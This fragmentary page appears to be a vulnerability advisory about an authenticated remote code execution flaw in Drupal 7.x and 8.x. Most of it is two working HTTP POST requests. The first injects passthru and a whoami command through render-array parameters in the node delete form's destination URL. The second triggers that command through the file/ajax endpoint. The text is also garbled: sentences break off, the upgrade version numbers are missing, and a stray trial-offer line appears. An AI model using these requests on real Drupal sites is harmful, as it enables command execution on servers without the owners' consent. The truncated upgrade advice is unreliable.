multiple subsystems of Drupal
7.x and 8.x are vulnerable to RCE as they don't properly sanitize URL endpoints where arrays can be supplied through URL parameters.
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
POST /?q=node/99/delete&destination=node?q[%2523]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1 [...] form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, and then triggering the exploit with :
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1 [...] form_build_id=[FORM_BUILD_ID]
This will display the result of the
7.x, upgrade to Drupal
8.5.x, upgrade to Drupal
8.4.x, upgrade to Drupal
14 days trial , No credit card upfront , Risk free